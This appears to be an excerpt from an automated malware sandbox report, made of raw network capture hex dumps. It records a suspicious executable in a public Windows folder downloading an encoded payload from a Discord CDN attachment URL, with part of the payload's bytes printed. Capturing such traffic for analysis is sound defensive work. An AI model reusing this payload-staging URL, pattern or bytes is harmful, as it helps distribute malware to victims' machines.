                                Data Ascii: s.Ya ]#tofAbE;K{abDv/49zBnKlS8G7YFa2=uOhBqJv<=7V#a?<Z`^o*W$dXJ)Qs6BP(vR4G<1vZ)Aj"@ 5f/If*!A&t-BaLBv$QLa.|}EfR|
                                2022-06-26 07:42:48 UTC244INData Raw: 5e 55 aa bf b4 ca 34 b4 05 d1 50 0c d2 fc ef db e5 38 38 61 37 e9 d6 35 fb 59 74 4d ba 68 38 f9 69 db 89 f5 1b 05 18 15 2d c7 e6 68 fb 06 4a 0c 1b 4e d0 df 82 3b 81 80 c8 a9 b2 49 87 c1 76 73 f0 9c c3 2f b2 f8 e0 5c 22 d6 1b 0b 88 55 6a 55 2d a3 3a 82 6e d4 18 df 87 66 4d 99 d2 5e be 58 f4 fb cf 70 98 e2 4c 2f 51 0d 57 55 09 0a 6d ff df 04 64 af a8 34 d2 d8 e0 66 8c 6c ac dd a2 24 9d ea 02 5f 1b 84 b5 85 c4 e4 e6 6b 24 26 dd 54 c2 52 c7 c4 0b 77 4c 8e 09 70 b2 b6 05 be 20 6e 79 f2 b7 ab 66 2a 1b 5b 45 95 07 fb 38 b4 ef 40 38 f1 2e 39 eb 21 66 0d 99 87 b2 b4 fc 00 d5 b5 f0 c7 8e d5 f5 9c 58 a2 cd 9c 76 67 30 12 10 47 02 5d 10 f0 e5 9d 2d fa 61 c8 83 52 06 8d d3 3f 1c 90 b6 c3 41 6e a5 c7 f3 28 f3 4c 15 b4 90 0e ca ae c4 5e 1a d6 38 2f 74 7d 7a 79 ca 04 9b
                                Data Ascii: ^U4P88a75YtMh8i-hJN;Ivs/\"UjU-:nfM^XpL/QWUmd4fl$_k$&TRwLp nyf*[E8@8.9!fXvg0G]-aR?An(L^8/t}zy
                                2022-06-26 07:42:48 UTC248INData Raw: 63 5c 5e e0 04 d4 a9 c7 95 e2 96 21 17 4b 1f 0a a0 5f c4 68 6a a9 49 d5 4f c4 05 fa e9 49 22 04 2b f5 cb cd 1e a2 f1 84 a8 28 19 8b 08 ef 7c 5c 02 87 d6 4d 3b 77 75 44 a2 2a e5 79 7c ed 7a 58 f2 5b ce 6a 79 d1 15 b0 97 9a 66 ac 0f 38 a5 b4 de 6f 79 95 87 5a f8 90 e9 c0 22 91 b2 85 31 1a 8e 9b c8 dc 43 52 cc e0 45 ed 61 6c 6c a3 e4 f5 63 a2 99 c4 d5 85 a2 55 cc 26 51 89 61 f0 52 46 57 4d 24 30 2d 48 41 cb ba 80 6a a2 56 07 4f 67 b4 9b a6 77 5a 96 fd ce 9e 31 2b 25 0f ed 02 99 5b f6 09 54 61 3a 34 c3 33 6f 98 ae 46 3e 92 3d 02 e3 e2 ef fa a2 21 77 05 ba 49 b9 7b 19 37 7a 8e 87 e3 6e c0 f4 5d 7c d9 aa 0d 1c 3e 3d ce 3d 39 bf ca 82 9b aa 23 c7 d4 16 e3 57 c8 c1 be 77 8d f2 77 4f c8 18 4a b6 5f 70 4a c2 61 ce 0e 3e 35 da 0c ee 92 f2 25 48 16 85 ba 78 00 e0 da
                                Data Ascii: c\^!K_hjIOI"+(|\M;wuD*y|zX[jyf8oyZ"1CREallcU&QaRFWM$0-HAjVOgwZ1+%[Ta:43oF>=!wI{7zn]|>==9#WwwOJ_pJa>5%Hx
                                2022-06-26 07:42:48 UTC251INData Raw: c0 6a 5f 6c f4 7f 96 38 c7 b9 77 bd 8d 03 cb d5 b5 bc d6 00 ae e0 b3 c1 95 81 b3 ef ae 6b ff 73 4c 89 ac e6 7b c0 5d 1f b4 46 a2 ed 03 fe f4 26 9e 03 f6 ca 73 b6 f9 04 f1 35 64 b7 c3 68 0d 0a b1 90 c2 63 36 29 4d 31 7c 05 0a c3 a6 3b 47 e8 59 1e fd b4 e8 23 48 94 d2 c6 be 74 68 36 b9 28 7c fc 14 30 53 92 11 c3 b9 2f 9e 91 0c e0 fd df 69 d4 55 d7 19 9f e1 99 6b 69 59 50 8b 12 f5 23 cc e6 d5 a2 91 5f 62 d0 b8 52 ba 10 b3 88 ee 3f b0 f2 55 e0 93 4d 2f fc 5c 33 98 29 38 76 e5 0c 80 1c a2 90 15 a6 d4 c0 d3 d6 a2 54 39 ed e3 ff 26 2e c3 e3 41 a5 68 cc ea 66 e1 d1 c8 52 76 19 f8 26 c0 fc 22 ac ce 3d 13 bd d3 31 04 bb 0c f4 f3 c3 34 84 12 1a cf 42 a5 99 01 89 ec c0 bd 67 c4 6d 83 c1 3f 9c 36 7e f8 0d 50 ff d8 a1 4c 62 66 54 d0 1e 47 c7 80 8d 83 78 82 51 ff a6 de
                                Data Ascii: j_l8wksL{]F&s5dhc6)M1|;GY#Hth6(|0S/iUkiYP#_bR?UM/\3)8vT9&.AhfRv&"=14Bgm?6~PLbfTGxQ
                                2022-06-26 07:42:48 UTC255INData Raw: 27 6e 93 54 d4 30 ac 64 c7 ca 2e 58 c5 19 3e ca b6 d4 71 f7 89 de ef 13 52 5c dc 4f 3d 8a 53 e9 04 f5 9e be 71 7f 24 de 47 73 1b 1f 5c 1a cc ba 30 fa 78 dc 7c b2 9c 3d 36 11 d8 22 e2 7e 3f 47 b9 68 80 b5 9a 85 8b b8 d1 e2 3b 24 28 68 d9 d1 c8 a0 64 5b 0d f2 61 f9 18 d0 cb 60 44 b6 2b b8 d9 d0 17 c5 e2 b9 db 77 17 9b 2f f2 27 3f 02 e7 ca b5 21 11 6a 61 cb f8 54 bc 2a 61 ca b2 68 02 8f 39 34 a0 11 6a 47 64 4c 72 b3 3f 6d cc 00 0c a8 34 5c 6b 47 55 ee 9d c7 5e a3 73 86 82 20 a6 ba 6b 1c bd 6d d0 6d a1 10 49 f3 63 ef 40 f9 67 7e 44 6b f1 9d 66 d8 39 8b 2c 8d 06 64 de c5 4d a1 ae d0 1d 4c e8 be 69 c4 7e 88 de 43 fe a0 90 e0 fc d4 eb fb 18 e4 f3 69 a2 2a a4 61 8d cc 31 22 c2 24 19 05 22 d7 c1 7e c1 77 10 43 fc 9e 3c e2 b7 d0 22 32 63 51 08 38 58 4e 50 c2 02 3c
                                Data Ascii: 'nT0d.X>qR\O=Sq$Gs\0x|=6"~?Gh;$(hd[a`D+w/'?!jaT*ah94jGdLr?m4\kGU^s kmmIc@g~Dkf9,dMLi~Ci*a1"$"~wC<"2cQ8XNP<
                                2022-06-26 07:42:48 UTC259INData Raw: 30 32 c8 dc 5e 60 7a ae 30 b8 de aa b9 5a 39 24 00 66 08 54 c8 2c 3c 41 42 f0 5d fa 0c 1b 13 ad ff ec 72 d9 8d bd b8 47 da 20 8d f4 5d e7 82 ad b5 74 7d 1f 2d 0f 82 a3 08 ea 97 c2 9f 23 92 4b 4c 06 4c 4f 53 6a 32 94 90 a4 e7 2f b3 21 51 69 e5 a3 08 9e df a0 8a 52 85 9f a7 12 e2 07 20 4f 8c 16 15 9d c0 19 64 50 1c 6f d1 56 1a 77 cc a4 58 c2 8a 6b ca cf 43 2d 31 0d 56 ab f3 b4 e5 a9 28 dd 62 20 2b 49 12 c2 80 d6 86 9a b6 95 9c d1 98 8a a8 13 0d aa fc e6 32 ff 12 cd 6a db a4 d2 71 52 87 f8 54 b3 42 95 fd a7 39 e8 13 42 6e a5 f8 0c 82 0c 2d 75 6e af 12 9c c8 bc 03 71 b5 e8 47 61 b6 3d e6 ac 10 52 65 cd 57 23 94 18 6a 27 c4 bc 48 7d 5b 6d 1d 19 2a 0c 29 d8 7d 1f 1d eb 8b 94 e3 df d8 d4 73 8b b8 c8 21 d0 75 26 b8 ed 96 a0 16 8b ac 7b 82 1b 16 f4 b2 10 0f c4 d3
                                Data Ascii: 02^`z0Z9$fT,<AB]rG ]t}-#KLLOSj2/!QiR OdPoVwXkC-1V(b +I2jqRTB9Bn-unqGa=ReW#j'H}[m*)}s!u&{
                                2022-06-26 07:42:48 UTC263INData Raw: eb 6d 09 d5 0d 5f 06 74 6a 69 d7 f7 dc 3f c4 bb 2b bb 7a 08 06 35 51 8e 37 b8 4b 6c 3a f9 6b fa 75 82 f8 8c 25 7d 5e ff a5 50 ab f6 0d 5e 89 f0 c4 59 34 17 76 78 d2 90 57 8f 0b ca 09 c2 5b 16 13 74 5f b2 3b 07 66 d8 61 e3 4b ac 00 c8 a0 78 f9 fb 8c f0 cb 82 8c 4b 33 a4 f0 b4 2a 7f 69 f3 8d 89 03 3f 20 e0 2a a7 f7 1a f4 df 45 2c 58 1d 6e 48 1e 7e c9 c6 72 6e c1 85 04 59 8d 4c f2 c5 98 fa 52 e2 f2 ef fe 01 b7 e1 28 9f 02 10 42 a8 48 8e 11 13 2d 0a 1c ee 27 64 6b 47 2c e4 8a bb 54 3c 1e c3 1e ee 01 19 31 09 cc 6a f5 e5 3b a1 44 7e 38 0b 5a 01 27 4e 56 2f a8 3f 68 f1 f7 46 b9 fd 59 2c 8d 9f a9 e1 2c 35 bd 99 4b 39 77 09 e4 e0 aa b2 46 3f 15 a7 19 4b 9c a5 54 93 6c 8e c7 6f 5d bc 30 91 bb 40 1e 6b 88 31 b5 df 1f de 48 0c 06 c5 0b 19 50 2d e1 90 71 d7 5c 9f 2c
                                Data Ascii: m_tji?+z5Q7Kl:ku%}^P^Y4vxW[t_;faKxK3*i? *E,XnH~rnYLR(BH-'dkG,T<1j;D~8Z'NV/?hFY,,5K9wF?KTlo]0@k1HP-q\,
                                2022-06-26 07:42:48 UTC267INData Raw: 6c bc be 43 ba 80 4a 55 1d d0 2c 51 54 a9 84 72 85 1d c6 a9 30 b1 aa 88 f2 7e fe f6 2d 88 d2 f2 7b 12 9e 7a db 6a 01 7f f0 25 89 c3 70 60 bd 4b 9f 2a e1 d5 5c f4 60 39 37 dd f0 da 02 e3 a3 23 89 48 ee a1 04 44 5c 62 c1 38 99 93 05 cc 2a bd c4 db 59 81 95 42 40 0f 04 12 0f cf 83 09 d4 7e 6a 0a 42 d0 18 42 e3 f7 03 fe 94 42 b4 c6 41 d0 b0 47 1c 8c 00 2a d7 7c 71 db 8f ad 3a 64 0a 91 5e 27 6c 12 de 48 56 72 28 ab 8b 0c 62 75 ef 01 51 0a 0c f1 5a d5 86 44 a3 97 f3 60 d3 79 70 8f 0a b5 d6 71 18 a1 a5 52 92 b5 35 0a 37 22 cd 2a 31 29 22 30 de 1a a1 3f b2 b8 e6 51 a2 45 74 bc c1 02 cb e8 96 6b b1 19 0f d6 d8 6d 6d 6b 40 f1 15 7c de e3 31 1b c8 a9 d1 5c ea e8 ad 88 d7 11 f4 69 cd 53 64 93 25 b4 f6 cd 28 ef b7 40 ef be 32 1f d8 53 56 c1 9a ae de bc 4f e0 01 c0 fa
                                Data Ascii: lCJU,QTr0~-{zj%p`K*\`97#HD\b8*YB@~jBBBAG*|q:d^'lHVr(buQZD`ypqR57"*1)"0?QEtkmmk@|1\iSd%(@2SVO
                                2022-06-26 07:42:48 UTC271INData Raw: c6 6d 0c fa 29 c1 70 1b 51 bc 48 f5 81 62 00 28 17 11 89 11 cb 29 6d 0e cd 92 25 bd 66 2a a6 a0 00 5a cd 29 57 7b db 19 25 77 80 17 9a 18 28 14 2c da 24 fd 9b b0 54 a4 09 1e cb 12 f7 bd 41 7c 64 74 3c c9 3d 3b 5c cf ab 90 91 de 54 5d 09 06 34 ea 36 d7 9c 50 c4 4b f0 29 96 e0 ac 4e 6f b4 41 30 10 3d 0d 0d 37 d0 49 8d 85 65 1b 11 8e 8a 98 e0 72 5e 4d d8 dd 4e 50 d1 20 f4 5e 6f 44 09 43 f7 bb 35 48 19 ca 4e cf 69 ef fe e8 0a 22 d4 ca 0c 15 ea c0 b6 73 46 b5 6e 88 18 c8 5f e9 af 85 50 81 dd 7b 11 d9 f0 20 d6 e3 f8 d7 07 62 e7 2d e3 13 fa d4 91 59 2c c6 cd a1 51 d0 49 e9 ca 52 e8 6f 0c a0 82 2b 65 b9 eb f5 0d aa 10 c0 d6 98 ea 73 13 53 a8 33 c7 e5 ae 2a 3c ba 56 62 6c f9 d2 90 a5 e0 4e a5 44 d0 3a f8 15 5a 9d 70 3e c8 5d 12 c6 50 88 3c a1 4a 11 fd d7 8e e4 7b
                                Data Ascii: m)pQHb()m%f*Z)W{%w(,$TA|dt<=;\T]46PK)NoA0=7Ier^MNP ^oDC5HNi"sFn_P{ b-Y,QIRo+esS3*<VblND:Zp>]P<J{
                                2022-06-26 07:42:48 UTC283INData Raw: 10 75 0a 59 57 81 33 0a 5e 71 c5 49 d7 50 03 12 fa d5 95 b4 f3 9f 98 93 39 02 6a af aa 72 87 c6 cb a5 b1 f8 f7 5b 2f 15 e5 7b 4e 1c 7e c0 71 f0 5b 2a b5 ee a5 89 70 99 16 0d cf fb e2 cb ac b1 f1 ad c3 2f fe 2a 1b 8e 4e 03 1e 7b 24 0b 3e e5 11 ce f1 e3 d3 c4 bf 49 c9 74 73 37 69 4a 65 d1 70 87 18 f5 41 98 85 ba d7 1e cc 70 a0 b9 45 79 9d ba 84 76 c3 03 c5 f3 25 53 89 d1 e3 7e cc 28 63 3e 57 27 82 b5 05 19 36 9f ca 6a 22 07 7e 93 ca fe 11 ec 46 46 27 a5 23 4c 66 e9 9d e1 53 2b 6f 93 e3 bd 1d 1b 57 c2 5f 8b 24 bb 45 39 ce f2 44 ce b9 85 ea 9b ab e8 82 8c f5 ed e6 59 dd 92 b3 8d 20 bd b1 0a 4b 6a 63 a3 6d ac 8c e5 d4 70 05 ba db 7b ab 38 57 cc 89 c2 31 76 b7 43 4c 39 bd c5 46 64 9b d6 fc 68 62 4e ee 11 2d 80 6b d7 aa 73 19 83 8d 60 59 68 f9 bb 8d a9 05 63 ec
                                Data Ascii: uYW3^qIP9jr[/{N~q[*p/*N{$>Its7iJepApEyv%S~(c>W'6j"~FF'#LfS+oW_$E9DY Kjcmp{8W1vCL9FdhbN-ks`Yhc
                                2022-06-26 07:42:48 UTC287INData Raw: 31 76 44 1c c2 43 1f 51 2d 76 31 ef 22 c1 34 3d d4 96 16 30 5d 12 54 f1 8e 42 29 4f 8c 0d bc ea 8f fd d5 b8 22 4a 4f 04 c2 84 5d 55 ef 87 06 b8 b5 fa 9c 2e 03 8a 4f 90 04 97 12 aa d0 d6 df 6c d5 e6 0b dc 2b 03 c4 93 1f 74 06 76 07 24 72 7e 50 fc 03 f9 b2 fb b3 a0 40 34 1b 99 8b f1 3b 11 9d 77 f3 86 12 04 77 4f b8 69 ec f4 bd 50 8b 25 c7 40 9f 85 88 fa 12 f3 94 5f d3 07 69 1b 20 38 9f db 15 95 8f 2c 13 42 f5 20 8c bd 54 57 80 7d bd 2d ba e1 3a d7 9b c2 1d bc 5a fb 0b f1 e9 68 38 60 e0 97 36 6a ca 67 45 ec 2b 8f e5 f5 c8 f3 6b b2 30 33 34 ce bd e0 39 e6 5b 30 fa f2 16 46 a2 c9 f9 7d f5 62 31 04 23 72 c3 f5 4c 8b 9b 44 b3 ba d3 5c b1 2d ff 43 a3 6d 77 cd e5 76 af 01 be 72 bf d6 a6 b0 ec ef 74 cd 9f 57 96 5a 7f b3 df 37 ae c3 96 6f 18 fa 6d 3c fd 75 c0 02 f3
                                Data Ascii: 1vDCQ-v1"4=0]TB)O"JO]U.Ol+tv$r~P@4;wwOiP%@_i 8,B TW}-:Zh8`6jgE+k0349[0F}b1#rLD\-CmwvrtWZ7om<u
                                2022-06-26 07:42:48 UTC303INData Raw: 73 bc ae fc a3 a2 31 be ad 92 38 fd 67 a5 e6 72 92 1a 64 35 ea 8c 45 d1 45 a3 e7 1f b9 a9 a6 0a 92 39 d9 0f 91 3c bc e0 00 a6 ca bd e1 72 00 7e 46 5b d9 00 7e b4 70 85 66 a2 c8 72 e9 44 f2 2c 74 51 e2 fe 5c 79 6c 07 ea d4 ab cb d4 3b fe 80 7d 9e 94 37 57 40 a3 40 31 45 45 33 00 f2 2c b1 d1 e8 7b c6 fa 44 53 3d af d2 36 3e 07 76 d6 d2 81 d7 02 74 64 7e 29 0e ca 6f be 57 40 7c c9 21 3c 1d 16 a2 d4 3f 9f dd 70 6f 67 87 6f e3 1c e1 0e de ea 0c 14 1a 97 ed dd 34 66 44 45 92 e6 60 36 63 8b c0 a4 2a e7 2b 7c c2 a0 11 3c 78 67 2e 09 5e 32 2e 96 d6 e5 44 d2 1b 49 51 61 b7 e6 f2 3c 35 47 90 0a c7 5a 98 27 fe b8 57 a5 f6 1f 5c f1 e3 b5 d6 e7 bb 19 61 39 9b ce ff 6b f8 2b af 26 8e c6 db ce f5 6a 50 8b 4e 2c 60 9e e6 a3 d1 70 e2 e2 b2 9a b1 aa 4e c2 c1 55 ab 3a 7d f2
                                Data Ascii: s18grd5EE9<r~F[~pfrD,tQ\yl;}7W@@1EE3,{DS=6>vtd~)oW@|!<?pogo4fDE`6c*+|<xg.^2.DIQa<5GZ'W\a9k+&jPN,`pNU:}
                                2022-06-26 07:42:48 UTC315INData Raw: f0 55 d2 a4 ba 6b 88 7a 67 59 ec f4 69 5a df e8 0c 85 d7 4d 37 55 73 9e 36 93 19 0a 7f d4 b1 a8 22 fb ef cd a0 75 bd cd 1d 94 1d 67 6d 63 91 97 7a 0d 8c 33 45 45 48 94 e3 ad 35 76 a1 9c 8e cc 68 76 11 f6 1d 89 1b 8a 9a c7 2d 5b 3f db 49 21 02 20 9d 75 1e b7 87 55 bd e4 da 4b b3 8a aa 23 ab 36 68 4e fd 5c 74 d8 a1 e6 36 36 51 75 58 9f 0a 77 29 0d c0 b0 11 6a ba 3e 26 69 8d 7f 4c 68 72 ca 61 44 92 22 81 6d f2 01 5e 82 88 13 cb f2 e7 91 c4 d0 6f dd 7a 9c 6f b6 53 40 61 8f 79 85 dd c9 fa 9e 3b 9d 11 32 87 45 60 3c 84 30 1d fd b1 77 21 9d 6c f3 3b 80 75 a0 60 d1 fc c0 3f 94 58 d2 f9 01 4e 5a 04 b5 36 32 72 01 9b 9b b9 60 61 c2 97 bc e7 db 38 f8 f7 35 49 fa e5 91 06 9d 9d a1 95 28 0f c4 61 04 95 00 a9 00 c9 57 d3 13 a5 bd 7f 3c 08 4c b9 c8 58 ea 58 7c 64 29 20
                                Data Ascii: UkzgYiZM7Us6"ugmcz3EEH5vhv-[?I! uUK#6hN\t66QuXw)j>&iLhraD"m^ozoS@ay;2E`<0w!l;u`?XNZ62r`a85I(aW<LXX|d)
                                2022-06-26 07:42:48 UTC331INData Raw: 77 9b 55 55 00 4a 77 2e 79 0a 30 34 32 7d 55 55 77 4a 2e 77 89 8b 2e 77 75 4a 85 34 32 7d 79 4a 89 4f 00 75 4a 77 9b 55 55 00 4a 77 2e 79 0a 30 34 32 7d 55 55 77 4a 2e 77 89 8b 2e 77 75 4a 34 32 7d 79 4a 89 4f 00 75 4a 77 9b 55 55 00 4a 77 2e 79 0a 30 34 32 7d 55 55 77 4a 2e 77 89 8b 2e 77 75 4a 85 34 32 7d 79 4a 89 4f 00 75 4a 77 9b 55 55 00 4a 77 2e 79 0a 30 34 32 7d 55 55 77 4a 2e 77 89 8b 2e 77 75 4a 34 32 7d 79 4a 89 4f 00 75 4a 77 9b 55 55 00 4a 77 2e 79 0a 30 34 32 7d 55 55 77 4a 2e 77 89 8b 2e 77 75 4a 3c 85 8d 75 75 1c 69 69 24 73 22 7d 7d 75 1c 69 69 24 73 22 75 1c 69 69 24 73 22 7d 7d 75 1c 69 69 24 73 22 75 1c 69 69 24 73 22 7d 7d 75 1c 69 69 24 73 22 75 1c 69 69 24 73 22 7d 7d 75 1c 69 69 24 73 22 75 1c 69 69 24 73 22 7d 7d 75 1c 69 69 24 73
                                Data Ascii: wUUJw.y042}UUwJ.w.wuJ42}yJOuJwUUJw.y042}UUwJ.w.wuJ42}yJOuJwUUJw.y042}UUwJ.w.wuJ42}yJOuJwUUJw.y042}UUwJ.w.wuJ42}yJOuJwUUJw.y042}UUwJ.w.wuJ<uuii$s"}}uii$s"uii$s"}}uii$s"uii$s"}}uii$s"uii$s"}}uii$s"uii$s"}}uii$s


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                2192.168.2.349745162.159.133.233443C:\Users\Public\Libraries\Eluiezilfw.exe
                                TimestampkBytes transferredDirectionData
                                2022-06-26 07:43:09 UTC331OUTGET /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm HTTP/1.1
                                User-Agent: 16
                                Host: cdn.discordapp.com
                                Cache-Control: no-cache
                                2022-06-26 07:43:09 UTC331INHTTP/1.1 200 OK
                                Date: Sun, 26 Jun 2022 07:43:09 GMT
                                Content-Type: application/octet-stream
                                Content-Length: 279040
                                Connection: close
                                CF-Ray: 72144f71797c5c85-FRA
                                Accept-Ranges: bytes
                                Age: 3086
                                Cache-Control: public, max-age=31536000
                                Content-Disposition: attachment;%20filename=Eluiezilfwmdrgrdfrqpnwmurrnwnhm
                                ETag: "7d74af495b07aad93486870343b767e3"
                                Expires: Mon, 26 Jun 2023 07:43:09 GMT
                                Last-Modified: Sun, 26 Jun 2022 05:30:40 GMT
                                Vary: Accept-Encoding
                                CF-Cache-Status: HIT
                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                x-goog-generation: 1656221440589477
                                x-goog-hash: crc32c=Xt3y7g==
                                x-goog-hash: md5=fXSvSVsHqtk0hocDQ7dn4w==
                                x-goog-metageneration: 1
                                x-goog-storage-class: STANDARD
                                x-goog-stored-content-encoding: identity
                                x-goog-stored-content-length: 279040
                                X-GUploader-UploadID: ADPycdtJ7t9fCETp7UygsO08dpsnNnPY5cqzUa7Rm36R-2-yoeBJxLn_rXiCmsw2Ou5CLTbZXuNNnlYW7HZr2ZJiNfBM0vIyGhBb
                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=F7V%2B7cVzdxh9zuxlufANpShCCOFVhVgCy2aOmOiTNIaOzcSNPORQiutEtennUmotp1aGvpQi%2FPkG2W4fv31d3S60A7tQVDudvVi2V5%2FXJIBolE1brOfDeVQMn%2Fp5HmMUZcXyFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                2022-06-26 07:43:09 UTC333INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                2022-06-26 07:43:09 UTC333INData Raw: 28 7f b5 25 de 25 25 25 29 25 25 25 da da 25 25 dd 25 25 25 25 25 25 25 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 dc 25 25 33 fa df 33 25 d9 e4 a8 fc dd dc 71 a8 fc 79 8d 44 4e 45 95 97 4a 42 97 3c 48 45 3e 3c 93 93 4a 99 45 87 40 45 97 50 93 45 44 93 45 69 2a 2e 45 48 4a 89 40 53 e8 e8 2f 49 25 25 25 25 25 25 25 19 fb 3d ab d5 92 9b b0 d5 92 9b b0 d5 92 9b b0 0e 86 9d b0 92 92 9b b0 ba cd 58 b0 8e 92 9b b0 ba cd a1 b0 96 92 9b b0 ba cd 97 b0 d7 92 9b b0 63 9a 04 b0 90 92 9b b0 7d cd 58 b0 8e 92 9b b0 63 9a 3b b0 8c 92 9b b0 d5 92 52 b0 a5 db 9b b0 0e 9a 06 b0 7e 92 9b b0 ab 6c 58 b0 47 92 9b b0 ab 6c a1 b0 8c 92 9b b0 86 4f 01 b0 d9 92 9b b0 52 8c 95 b0 8c 92 9b b0 77 44 3e 8d d5 92 9b
                                Data Ascii: (%%%%)%%%%%%%%%%%%e%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%33%qyDNEJB<HE><JE@EPEDEi*.EHJ@S/I%%%%%%%=Xc}Xc;R~lXGlORwD>
                                2022-06-26 07:43:09 UTC334INData Raw: 59 65 25 ec 79 24 93 99 40 97 8b 3c 3e 40 89 2a 87 8f 40 3e 99 66 e5 da 00 b5 cc 1c 25 66 e5 da 00 b1 cc 1c 25 66 e5 da 00 ad cc 1c 25 66 e5 da 00 a9 cc 1c 25 66 e5 da 00 a5 cc 1c 25 66 e5 da 00 c9 cc 1c 25 66 e5 da 00 a1 cc 1c 25 66 e5 da 00 c5 cc 1c 25 66 e5 da 00 9d cc 1c 25 66 e5 da 00 99 cc 1c 25 66 e5 da 00 95 cc 1c 25 66 e5 da 00 91 cc 1c 25 66 e5 da 00 8d cc 1c 25 66 e5 da 00 89 cc 1c 25 66 e5 da 00 85 cc 1c 25 66 e5 da 00 81 cc 1c 25 66 e5 da 00 7d cc 1c 25 66 e5 da 00 79 cc 1c 25 66 e5 da 00 75 cc 1c 25 66 e5 da 00 c1 cc 1c 25 66 e5 da 00 71 cc 1c 25 66 e5 da 00 6d cc 1c 25 66 e5 da 00 69 cc 1c 25 66 e5 da 00 d9 cc 1c 25 66 e5 da 00 d5 cc 1c 25 66 e5 da 00 d1 cc 1c 25 66 e5 da 00 65 cc 1c 25 66 e5 da 00 61 cc 1c 25 66 e5 da 00 e9 cc 1c 25 66 e5
                                Data Ascii: Ye%y$@<>@*@>f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f}%fy%fu%f%fq%fm%fi%f%f%f%fe%fa%f%f
                                2022-06-26 07:43:09 UTC336INData Raw: 25 66 2b 66 65 2d 75 0d 3b 21 da da 60 e5 50 2f a2 e0 ed c0 1c 25 dc 25 25 25 66 2b 0d ec d8 da da 66 69 49 29 64 2b dd 11 c0 1c 25 16 2b 50 b1 0e e5 64 e2 5e a1 49 31 25 99 ec 66 69 49 2d 64 e2 66 69 49 31 06 69 49 2d 64 22 29 5e e9 3d 38 3a 83 36 9e 66 e5 2e 7b 32 30 5e e9 0d 66 b4 64 39 49 68 99 49 2d 68 a1 49 29 68 91 49 31 66 f5 66 ef 5c bc 25 15 da da 64 71 49 35 de 39 49 5c e7 da ea 25 25 5c 07 25 15 da da 64 79 49 39 66 69 49 35 64 de 66 69 49 39 06 69 49 35 64 1e 29 7c 11 c0 1c 25 64 e2 c6 36 66 e2 66 65 2d 64 2b 66 e2 66 65 31 de 2b 64 20 25 66 2b 16 69 49 35 4e 2b 66 69 49 35 64 2b 66 20 25 16 69 49 39 9b e2 66 69 49 39 64 20 25 66 2b 16 20 25 4e fa 8f 29 8d 25 35 25 25 66 20 25 06 2b 75 66 2b 75 0d 4b d6 da da 60 e5 50 2b 0e e5 64 de c6 ea 66
                                Data Ascii: %f+fe-u;!`P/%%%%f+fiI)d+%+Pd^I1%fiI-dfiI1iI-d")^=8:6f.{20^fd9IhI-hI)hI1ff\%dqI59I\%%\%dyI9fiI5dfiI9iI5d)|%d6ffe-d+ffe1+d %f+iI5N+fiI5d+f %iI9fiI9d %f+ %N)%5%%f %+uf+uK`P+df
                                2022-06-26 07:43:09 UTC337INData Raw: 0d f9 1b da da eb e0 e9 c0 1c 25 25 7c 49 0b 1c 25 75 0d c7 1b da da 0e e5 7e 49 0b 1c 25 7c 11 c0 1c 25 64 20 1d c6 f6 8d 25 a5 25 25 8f 25 66 20 1d 66 65 2d 75 0d b3 1b da da 66 20 1d 66 25 64 20 1d dd 11 c0 1c 25 16 20 1d 50 b6 dd 11 c0 1c 25 0d 43 d2 da da dd 21 c0 1c 25 0d 39 d2 da da dd 4d 0b 1c 25 0d 2f d2 da da 7c 09 c0 1c 25 64 20 21 5e 58 21 25 99 fc 66 20 21 66 25 7e 09 c0 1c 25 66 20 21 75 0d 08 1b da da 7c 09 c0 1c 25 64 20 21 5e 58 21 25 50 ba 0e e5 7f 34 34 89 64 35 8d b2 41 65 25 a5 18 28 05 1c 25 25 99 2f 8d f1 c0 1c 25 0d 02 1b da da 8d f1 c0 1c 25 0d 00 1b da da 9e c4 8a 41 25 25 c6 b6 34 34 38 9e b5 2e 5e e9 1d 16 e0 3d 0b 1c 25 50 e4 66 75 29 64 f0 3d 0b 1c 25 66 75 29 64 39 49 66 75 2d 5c 1f 25 35 25 25 5a 73 16 29 49 50 f2 60 f7 54
                                Data Ascii: %%|I%u~I%|%d %%%%f fe-uf f%d % P%C!%9M%/|%d !^X!%f !f%~%f !u|%d !^X!%P44d5Ae%(%%/%%A%%448.^=%Pfu)d=%fu)d9Ifu-\%5%%Zs)IP`T
                                2022-06-26 07:43:09 UTC338INData Raw: 29 66 e2 7e 45 0b 1c 25 66 22 29 7e 41 0b 1c 25 d5 dc 5e e9 35 3a 83 36 9e 68 65 25 2e 5e e9 1d 66 fd 66 f9 68 1e 29 0d 19 1b da da 5e 61 49 25 99 e6 66 e9 0d 32 da da da a9 e5 50 29 0e e5 c6 27 d5 dc 34 7f 36 9e b5 2e 7b 5e e9 1d 66 17 66 fd 66 f1 68 7b 29 66 9e 0d 46 d2 da da 5e 61 49 25 99 e6 66 e9 0d 4b da da da a9 e5 50 29 0e e5 c6 27 d5 dc 34 7f 83 36 9e 68 65 25 2c 66 f9 0e a4 64 2f 60 e5 54 de 5e e5 de 9c 1d 27 18 25 29 25 25 5a f4 66 e8 49 0b 1c 25 66 71 5c 19 64 2f 5e 5f 25 50 2d 65 18 dc 29 25 25 50 c2 66 27 7f 9e 68 65 25 2e 7b 32 30 5e e9 19 66 fd 68 99 49 2d 9a 3d 0b 1c 25 98 41 0b 1c 25 7c 35 0b 1c 25 64 2b 66 2b 16 7d 2d 